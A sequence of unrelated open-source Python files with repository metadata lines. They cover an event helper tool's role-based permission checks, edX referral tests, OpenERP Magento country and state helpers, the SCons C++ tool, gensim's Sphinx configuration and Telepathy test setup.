ACCESS_JOB_VIEW_MAILS = "ACCESS_JOB_VIEW_MAILS" # view sent mails for job
ACCESS_JOB_VIEW_STATISTICS = "ACCESS_JOB_VIEW_STATISTICS" # view statistics for job (currently for t-shirts)
ACCESS_HELPER_EDIT = "ACCESS_HELPER_EDIT" # edit the personal data of a helper
ACCESS_HELPER_VIEW = "ACCESS_HELPER_VIEW" # view the personal data of a helper
ACCESS_HELPER_INTERNAL_COMMENT_EDIT = "ACCESS_HELPER_INTERNAL_COMMENT_EDIT" # edit the internal comment of a helper
ACCESS_HELPER_INTERNAL_COMMENT_VIEW = "ACCESS_HELPER_INTERNAL_COMMENT_VIEW" # view the internal comment of a helper
ACCESS_HELPER_RESEND = "ACCESS_HELPER_RESEND" # resend the confirmation mail to a helper
ACCESS_INVENTORY_EDIT = "ACCESS_INVENTORY_EDIT" # edit inventory settings for an event
ACCESS_INVENTORY_HANDLE = "ACCESS_INVENTORY_HANDLE" # register and take back inventory
ACCESS_BADGES_EDIT = "ACCESS_BADGES_EDIT" # edit badge settings for an event
ACCESS_BADGES_EDIT_HELPER = "ACCESS_BADGES_EDIT_HELPER" # edit badges of single helpers
ACCESS_BADGES_EDIT_SPECIAL = "ACCESS_BADGES_EDIT_SPECIAL" # edit special badges (=badges without helpers)
ACCESS_BADGES_GENERATE = "ACCESS_BADGES_GENERATE" # generate and register badges
ACCESS_MAILS_SEND = "ACCESS_MAILS_SEND" # can send all mails of an event
ACCESS_MAILS_VIEW = "ACCESS_MAILS_VIEW" # can view all mails of an event
ACCESS_STATISTICS_VIEW = "ACCESS_STATISTICS_VIEW" # can view statistics
ACCESS_GIFTS_EDIT = "ACCESS_GIFTS_EDIT" # edit gift settings for an event
ACCESS_GIFTS_HANDLE_GIFTS = "ACCESS_GIFTS_HANDLE_GIFTS" # give gifts to helpers
ACCESS_GIFTS_HANDLE_PRESENCE = "ACCESS_GIFTS_HANDLE_PRESENCE" # change presence of helpers
ACCESS_GIFTS_VIEW_SUMMARY = "ACCESS_GIFTS_VIEW_SUMMARY" # view summary of gift data (collected deposit, missing shirts)
ACCESS_PREREQUISITES_EDIT = "ACCESS_PREREQUISITES_EDIT" # edit prerequisite settings for an event
ACCESS_PREREQUISITES_VIEW = "ACCESS_PREREQUISITES_VIEW" # view global lists which helper fulfils which prerequisites
ACCESS_PREREQUISITES_HANDLE = "ACCESS_PREREQUISITES_HANDLE" # set for helpers whether they fulfil prerequisites
ACCESS_CORONA_EDIT = "ACCESS_CORONA_EDIT" # edit corona settings for an event
ACCESS_CORONA_VIEW = "ACCESS_CORONA_VIEW" # view contact tracing data for an event
# Based on requested access and role, we can decide whether we grant access or not.
# Here, for each access type, the allowed/required roles are listed.
_rbac_matrix = {
ACCESS_INVOLVED: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
EventAdminRoles.ROLE_BADGES,
],
ACCESS_EVENT_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_EVENT_EDIT_LINKS: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_EVENT_EDIT_JOBS: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_EVENT_EXPORT_HELPERS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_EVENT_EDIT_DUPLICATES: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_EVENT_VIEW_COORDINATORS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_EVENT_VIEW_AUDITLOGS: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_JOB_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_JOB_EDIT_HELPERS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_JOB_VIEW_HELPERS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_JOB_SEND_MAILS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_JOB_VIEW_MAILS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_JOB_VIEW_STATISTICS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_HELPER_EDIT: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_HELPER_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_HELPER_INTERNAL_COMMENT_EDIT: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
],
ACCESS_HELPER_INTERNAL_COMMENT_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_HELPER_RESEND: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
],
ACCESS_INVENTORY_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_INVENTORY_HANDLE: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_BADGES_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_BADGES_EDIT_HELPER: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_BADGES_EDIT_SPECIAL: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_BADGES_GENERATE: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_BADGES,
],
ACCESS_MAILS_SEND: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_MAILS_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_STATISTICS_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_GIFTS_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_GIFTS_HANDLE_GIFTS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
],
ACCESS_GIFTS_HANDLE_PRESENCE: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_GIFTS_VIEW_SUMMARY: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_PREREQUISITES_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_PREREQUISITES_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_PREREQUISITES_HANDLE: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_CORONA_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_CORONA_VIEW: [
EventAdminRoles.ROLE_ADMIN,
],
}
def has_access(user, resource, access):
"""
Checks whether the user has access to the resource with the requested access type.
"""
# No user, no permissions
if not user.is_authenticated:
return False
# superuser can do anything
if user.is_superuser:
return True
# check type of accessed resource
if isinstance(resource, Event):
return _has_access_event(user, resource, access)
elif isinstance(resource, Job):
return _has_access_job(user, resource, access)
elif isinstance(resource, Helper):
return _has_access_helper(user, resource, access)
else:
raise ValueError("Invalid resource type")
def has_access_event_or_job(user, event, access_event, access_job):
"""
Checks whether the user has access to the event with the specified `access_event`
or to any job of the event with `access_job`.
`access_event` can be `None`.
"""
# check event
if access_event and has_access(user, event, access_event):
return True
# check jobs
for job in event.job_set.all():
if has_access(user, job, access_job):
return True
return False
def _has_access_event(user, event, access):
# check role
if _check_event_role(user, event, access):
return True
# special cases
if access == ACCESS_INVOLVED:
# involved: also check jobs
for job in event.job_set.all():
if _check_job_role(user, job, access):
return True
# nothing worked, no access
return False
def _has_access_job(user, job, access):
# check role
if _check_event_role(user, job.event, access):
return True
# handle job admins
if _check_job_role(user, job, access):
return True
return False
def _has_access_helper(user, helper, access):
# check role
if _check_event_role(user, helper.event, access):
return True
# handle job admins for helpers
for shift in helper.shifts.all():
if _check_job_role(user, shift.job, access):
return True
# handle job admins for coordinators
for job in helper.job_set.all():
if _check_job_role(user, job, access):
return True
return False
def _check_event_role(user, event, access):
"""
Check whether the user has a required role for this access
"""
# get admin roles of user
try:
admin_roles = EventAdminRoles.objects.get(event=event, user=user).roles
except EventAdminRoles.DoesNotExist:
return False
# get required roles for this access type
try:
required_roles = _rbac_matrix[access]
except KeyError:
raise ValueError("Invalid access type")
    # check whether the user has one of the required roles; if so, grant access
for role in admin_roles:
if role in required_roles:
return True
return False
def _check_job_role(user, job, access):
# user is job admin or not, nothing more
return job.job_admins.filter(pk=user.pk).exists()
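# Usage sketch (editor's addition): a typical view guard built on has_access().
# The view function below is hypothetical; only has_access() and the ACCESS_*
# constants come from this module.
#
#     from django.core.exceptions import PermissionDenied
#
#     def edit_event(request, event):
#         if not has_access(request.user, event, ACCESS_EVENT_EDIT):
#             raise PermissionDenied()
#         ...  # render the edit form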
|
helfertool/helfertool
|
src/registration/permissions.py
|
Python
|
agpl-3.0
| 11,569
|
"""
Tests for smart_referral helpers
"""
from ddt import ddt, file_data
from django.test import TestCase
from lms.djangoapps.onboarding.tests.factories import OrganizationFactory, UserFactory
from openedx.features.smart_referral import helpers as filter_contacts_helpers
from openedx.features.smart_referral.tests.factories import SmartReferralFactory
from .constants import (
FILTER_CONTACTS_LIST_INDEX,
SORTED_CONTACT_LIST_INDEX,
SORTED_CONTACT_LIST_KEY,
SORTED_NON_PLATFORM_CONTACT_LIST_INDEX,
SORTED_NON_PLATFORM_CONTACT_LIST_KEY,
SORTED_PLATFORM_CONTACT_LIST_INDEX,
SORTED_PLATFORM_CONTACT_LIST_KEY,
UNSORTED_CONTACT_LIST_INDEX,
UNSORTED_CONTACT_LIST_KEY
)
@ddt
class FilterContactsAPIViewTestHelpers(TestCase):
"""
Class contains tests for smart_referral helpers
"""
def test_get_email_domain(self):
"""
        Test that the email domain is correctly extracted from the address passed to the 'get_email_domain' helper method.
:return: None
"""
test_email = 'testing.101@test.com'
expected_output = 'test.com'
actual_output = filter_contacts_helpers.get_email_domain(test_email)
self.assertEqual(expected_output, actual_output)
@file_data('data/test_data_contacts.json')
def test_sort_contacts_by_org_and_user_domain(self, contacts_data):
"""
        Test sorting of contacts by two criteria: first the organization admin's email domain,
        then the user's own email domain.
:param contacts_data: Json data that is read from json file provided in test annotation.
:return: None
"""
org_admin_email = 'admin@test.com'
admin_user = UserFactory(email=org_admin_email)
org = OrganizationFactory(admin=admin_user)
user = UserFactory(email='testing.101@edx.com')
user.extended_profile.organization = org
user.extended_profile.save() # pylint: disable=no-member
contact_list = contacts_data[UNSORTED_CONTACT_LIST_INDEX][UNSORTED_CONTACT_LIST_KEY]
expected_output = contacts_data[SORTED_CONTACT_LIST_INDEX][SORTED_CONTACT_LIST_KEY]
actual_output = filter_contacts_helpers.sort_contacts_by_org_and_user_domain(contact_list, user=user)
self.assertEqual(expected_output, actual_output)
@file_data('data/test_data_contacts.json')
def test_get_platform_contacts_and_non_platform_contacts(self, contacts_data):
"""
        Test splitting contacts into two separate lists: one for contacts who are
        registered on our platform and one for those who are not.
        :param contacts_data: JSON data read from the file given in the @file_data annotation.
:return: None
"""
UserFactory(email='testing.101@test.com')
UserFactory(email='testing.201@edx.com')
contact_list = contacts_data[SORTED_CONTACT_LIST_INDEX][SORTED_CONTACT_LIST_KEY]
expected_output_platform_contacts = \
contacts_data[SORTED_PLATFORM_CONTACT_LIST_INDEX][SORTED_PLATFORM_CONTACT_LIST_KEY]
expected_output_non_platform_contacts = \
contacts_data[SORTED_NON_PLATFORM_CONTACT_LIST_INDEX][SORTED_NON_PLATFORM_CONTACT_LIST_KEY]
actual_output_platform_contacts, actual_output_non_platform_contacts = \
filter_contacts_helpers.get_platform_contacts_and_non_platform_contacts(contact_list)
self.assertEqual(expected_output_platform_contacts, actual_output_platform_contacts)
self.assertEqual(expected_output_non_platform_contacts, actual_output_non_platform_contacts)
def test_get_org_admin_email_org_with_admin(self):
"""
        Test getting the admin's email for the organization with which the user is affiliated.
:return: None
"""
org_admin_email = 'admin@organization101.com'
admin_user = UserFactory(email=org_admin_email)
org = OrganizationFactory(admin=admin_user)
user = UserFactory(email='testing.101@test.com')
user.extended_profile.organization = org
user.extended_profile.save() # pylint: disable=no-member
actual_result = filter_contacts_helpers.get_org_admin_email(user)
self.assertEqual(org_admin_email, actual_result)
def test_get_org_admin_email_org_without_admin(self):
"""
        Test getting the admin's email for the organization with which the user is affiliated.
        In this case the organization doesn't have an admin, hence the resulting email address should be 'None'.
:return: None
"""
org = OrganizationFactory()
user = UserFactory(email='testing.101@test.com')
user.extended_profile.organization = org
user.extended_profile.save() # pylint: disable=no-member
actual_result = filter_contacts_helpers.get_org_admin_email(user)
self.assertIsNone(actual_result)
def test_get_org_admin_email_unaffiliated_user(self):
"""
        Test getting the admin's email for a user who isn't affiliated with any
        organization; since the user is unaffiliated, the resulting email address should be 'None'.
:return: None
"""
user = UserFactory(email='testing.101@test.com')
actual_result = filter_contacts_helpers.get_org_admin_email(user)
self.assertIsNone(actual_result)
@file_data('data/test_data_filter_referred_contacts.json')
def test_filter_referred_contacts_already_referred_by_current_user(self, contacts):
"""
        Test filtering out contacts that have already been referred by the current user.
"""
current_user = UserFactory(email='current_user@test.com')
any_other_user = UserFactory(email='any_other_user@test.com')
        # refer two different contacts as the current user; these should be filtered out
SmartReferralFactory(user=current_user, contact_email='testing1@test.com')
SmartReferralFactory(user=current_user, contact_email='testing3@test.com')
        # refer a contact once as some other user; it should not be filtered out
SmartReferralFactory(user=any_other_user, contact_email='testing1@test.com')
contact_list = contacts[FILTER_CONTACTS_LIST_INDEX]
filtered_contacts = filter_contacts_helpers.filter_referred_contacts(contact_list['all_contacts'], current_user)
self.assertEqual(filtered_contacts, contact_list['filter_contacts_referred_by_current_user'])
@file_data('data/test_data_filter_referred_contacts.json')
def test_filter_referred_contacts_already_referred_twice(self, contacts):
"""
        Test filtering out contacts that have already been referred twice by other users.
"""
current_user = UserFactory(email='current_user@test.com')
any_other_user1 = UserFactory(email='any_other_user1@test.com')
any_other_user2 = UserFactory(email='any_other_user2@test.com')
        # refer a single contact as two different users; it should be filtered out
SmartReferralFactory(user=any_other_user1, contact_email='testing4@test.com')
SmartReferralFactory(user=any_other_user2, contact_email='testing4@test.com')
        # refer a contact only once as another user; it should not be filtered out
SmartReferralFactory(user=any_other_user2, contact_email='testing1@test.com')
contact_list = contacts[FILTER_CONTACTS_LIST_INDEX]
filtered_contacts = filter_contacts_helpers.filter_referred_contacts(contact_list['all_contacts'], current_user)
self.assertEqual(filtered_contacts, contact_list['filter_contacts_referred_twice'])
|
philanthropy-u/edx-platform
|
openedx/features/smart_referral/tests/test_helpers.py
|
Python
|
agpl-3.0
| 7,514
|
# -*- coding: utf-8 -*-
# © 2016 LasLabs Inc.
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
from . import test_medical_pharmacy
|
laslabs/vertical-medical
|
medical_pharmacy/tests/__init__.py
|
Python
|
agpl-3.0
| 152
|
# -*- coding: utf-8 -*-
"""
country
Country
:copyright: (c) 2013 by Openlabs Technologies & Consulting (P) Limited
:license: AGPLv3, see LICENSE for more details.
"""
from openerp.osv import osv
from openerp.tools.translate import _
import pycountry
class Country(osv.osv):
"Country"
_inherit = 'res.country'
def search_using_magento_code(self, cursor, user, code, context):
"""
Searches for country with given magento code.
:param cursor: Database cursor
:param user: ID of current user
:param code: ISO code of country
:param context: Application context
:return: Browse record of country if found else raises error
"""
country_ids = self.search(
cursor, user, [('code', '=', code)], context=context
)
if not country_ids:
raise osv.except_osv(
_('Not Found!'),
            _('Country with ISO code %s does not exist.') % code
)
country = self.browse(
cursor, user, country_ids[0], context=context
)
return country
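    # Illustrative call sketch (classic OpenERP osv API; cursor and user come
    # from the caller, and the pool lookup is the usual pattern):
    #
    #     country_obj = self.pool.get('res.country')
    #     us = country_obj.search_using_magento_code(cursor, user, 'US', context)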
class CountryState(osv.Model):
"Country State"
_inherit = 'res.country.state'
def find_or_create_using_magento_region(
self, cursor, user, country, region, context
):
"""
        Looks up, within `country`, the state matching the `region` sent by
        magento. If the state already exists it is returned; otherwise a new
        one is created and returned.
:param cursor: Database cursor
:param user: ID of current user
:param country: Browse record of country
:param region: Name of state from magento
:param context: Application context
:return: Browse record of record created/found
"""
state = self.find_using_magento_region(
cursor, user, country, region, context
)
if not state:
state = self.create_using_magento_region(
cursor, user, country, region, context
)
return state
def find_using_magento_region(
self, cursor, user, country, region, context
):
"""
        Looks for the state matching the `region` sent by magento and returns
        it if it already exists, otherwise None is returned.
:param cursor: Database cursor
:param user: ID of current user
:param country: Browse record of country
:param region: Name of state from magento
:param context: Application context
:return: Browse record of record found
"""
state_ids = self.search(
cursor, user, [
('name', 'ilike', region),
('country_id', '=', country.id),
], context=context
)
return state_ids and self.browse(
cursor, user, state_ids[0], context=context
) or None
def create_using_magento_region(
self, cursor, user, country, region, context
):
"""
Creates state for the region sent by magento
:param cursor: Database cursor
:param user: ID of current user
:param country: Browse record of country
:param region: Name of state from magento
:param context: Application context
:return: Browse record of record created
"""
code = None
try:
for subdivision in pycountry.subdivisions.get(
country_code=country.code):
if subdivision.name.upper() == region.upper():
code = ''.join(list(region)[:3]).upper()
break
if not code:
if country.code == 'US':
code = 'APO'
else:
code = ''.join(list(region)[:3]).upper()
        except KeyError:
            raise osv.except_osv(
                _('Country Not Found!'),
                _('No country found with code %s') % country.code
            )
        # Create the state outside the try/except, so that the exception
        # raised above is not swallowed by a ``return`` inside a ``finally``
        # block.
        state_id = self.create(
            cursor, user, {
                'name': region,
                'country_id': country.id,
                'code': code,
            }, context=context
        )
        return self.browse(cursor, user, state_id, context=context)
|
jmesteve/openerpseda
|
openerp/addons_extra/magento_integration/country.py
|
Python
|
agpl-3.0
| 4,292
|
"""SCons.Tool.c++
Tool-specific initialization for generic Posix C++ compilers.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2015 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/c++.py rel_2.4.0:3365:9259ea1c13d7 2015/09/21 14:03:43 bdbaddog"
import os.path
import SCons.Tool
import SCons.Defaults
import SCons.Util
compilers = ['CC', 'c++']
CXXSuffixes = ['.cpp', '.cc', '.cxx', '.c++', '.C++', '.mm']
if SCons.Util.case_sensitive_suffixes('.c', '.C'):
CXXSuffixes.append('.C')
def iscplusplus(source):
if not source:
# Source might be None for unusual cases like SConf.
return 0
for s in source:
if s.sources:
ext = os.path.splitext(str(s.sources[0]))[1]
if ext in CXXSuffixes:
return 1
return 0
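# In other words, iscplusplus() answers 1 as soon as any source node's first
# underlying source file carries one of the CXXSuffixes above, and 0 otherwise.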
def generate(env):
"""
    Add Builders and construction variables for generic POSIX C++ compilers
to an Environment.
"""
import SCons.Tool
import SCons.Tool.cc
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
for suffix in CXXSuffixes:
static_obj.add_action(suffix, SCons.Defaults.CXXAction)
shared_obj.add_action(suffix, SCons.Defaults.ShCXXAction)
static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter)
shared_obj.add_emitter(suffix, SCons.Defaults.SharedObjectEmitter)
SCons.Tool.cc.add_common_cc_variables(env)
if 'CXX' not in env:
env['CXX'] = env.Detect(compilers) or compilers[0]
env['CXXFLAGS'] = SCons.Util.CLVar('')
env['CXXCOM'] = '$CXX -o $TARGET -c $CXXFLAGS $CCFLAGS $_CCCOMCOM $SOURCES'
env['SHCXX'] = '$CXX'
env['SHCXXFLAGS'] = SCons.Util.CLVar('$CXXFLAGS')
env['SHCXXCOM'] = '$SHCXX -o $TARGET -c $SHCXXFLAGS $SHCCFLAGS $_CCCOMCOM $SOURCES'
env['CPPDEFPREFIX'] = '-D'
env['CPPDEFSUFFIX'] = ''
env['INCPREFIX'] = '-I'
env['INCSUFFIX'] = ''
env['SHOBJSUFFIX'] = '.os'
env['OBJSUFFIX'] = '.o'
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 0
env['CXXFILESUFFIX'] = '.cc'
def exists(env):
return env.Detect(env.get('CXX', compilers))
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
Uli1/mapnik
|
scons/scons-local-2.4.0/SCons/Tool/c++.py
|
Python
|
lgpl-2.1
| 3,432
|
from os import name as __name
from sys import modules as __modules
from warnings import warn
if __name == 'java':
warn("%s is not yet supported on jython"%__modules[__name__])
else:
from reporter_metabolites import *
del __name, __modules
|
jerkos/cobrapy
|
cobra/topology/__init__.py
|
Python
|
lgpl-2.1
| 248
|
# -*- coding: utf-8 -*-
#
# gensim documentation build configuration file, created by
# sphinx-quickstart on Wed Mar 17 13:42:21 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
html_theme = 'gensim_theme'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinxcontrib.napoleon']
autoclass_content = "both"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'indextoc'
# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {'index': './_templates/indexcontent.html'}
# General information about the project.
project = u'gensim'
copyright = u'2009-now, Radim Řehůřek <me(at)radimrehurek.com>'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.3'
# The full version, including alpha/beta/rc tags.
release = '2.3.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# main_colour = "#ffbbbb"
html_theme_options = {
# "rightsidebar": "false",
# "stickysidebar": "true",
# "bodyfont": "'Lucida Grande', 'Lucida Sans Unicode', 'Geneva', 'Verdana', 'sans-serif'",
# "headfont": "'Lucida Grande', 'Lucida Sans Unicode', 'Geneva', 'Verdana', 'sans-serif'",
# "sidebarbgcolor": "fuckyou",
# "footerbgcolor": "#771111",
# "relbarbgcolor": "#993333",
# "sidebartextcolor": "#000000",
# "sidebarlinkcolor": "#330000",
# "codebgcolor": "#fffff0",
# "headtextcolor": "#000080",
# "headbgcolor": "#f0f0ff",
# "bgcolor": "#ffffff",
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['.']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "gensim"
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = ''
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {} # {'index': ['download.html', 'globaltoc.html', 'searchbox.html', 'indexsidebar.html']}
# html_sidebars = {'index': ['globaltoc.html', 'searchbox.html']}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
html_domain_indices = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'gensimdoc'
html_show_sphinx = False
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [('index', 'gensim.tex', u'gensim Documentation', u'Radim Řehůřek', 'manual')]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_use_modindex = True
suppress_warnings = ['image.nonlocal_uri', 'ref.citation', 'ref.footnote']
|
macks22/gensim
|
docs/src/conf.py
|
Python
|
lgpl-2.1
| 7,323
|
# This file is part of the GOsa framework.
#
# http://gosa-project.org
#
# Copyright:
# (C) 2016 GONICUS GmbH, Germany, http://www.gonicus.de
#
# See the LICENSE file in the project's top-level directory for details.
from lxml.builder import ElementMaker
def EventMaker():
"""
Returns the event skeleton object which can be directly used for
extending with event data.
"""
return ElementMaker(namespace="http://www.gonicus.de/Events", nsmap={None: "http://www.gonicus.de/Events"})
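# Illustrative usage sketch (the element names are hypothetical, not part of
# the GOsa event schema):
#
#     e = EventMaker()
#     event = e.Event(e.Notification(e.Title("Hello")))
#
# lxml.etree.tostring(event) then yields XML rooted in the
# http://www.gonicus.de/Events default namespace.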
|
gonicus/gosa
|
common/src/gosa/common/event.py
|
Python
|
lgpl-2.1
| 506
|
"""
Infrastructure code for testing connection managers.
"""
from twisted.internet import glib2reactor
from twisted.internet.protocol import Protocol, Factory, ClientFactory
glib2reactor.install()
import sys
import pprint
import unittest
import dbus.glib
from twisted.internet import reactor
import constants as cs
tp_name_prefix = 'org.freedesktop.Telepathy'
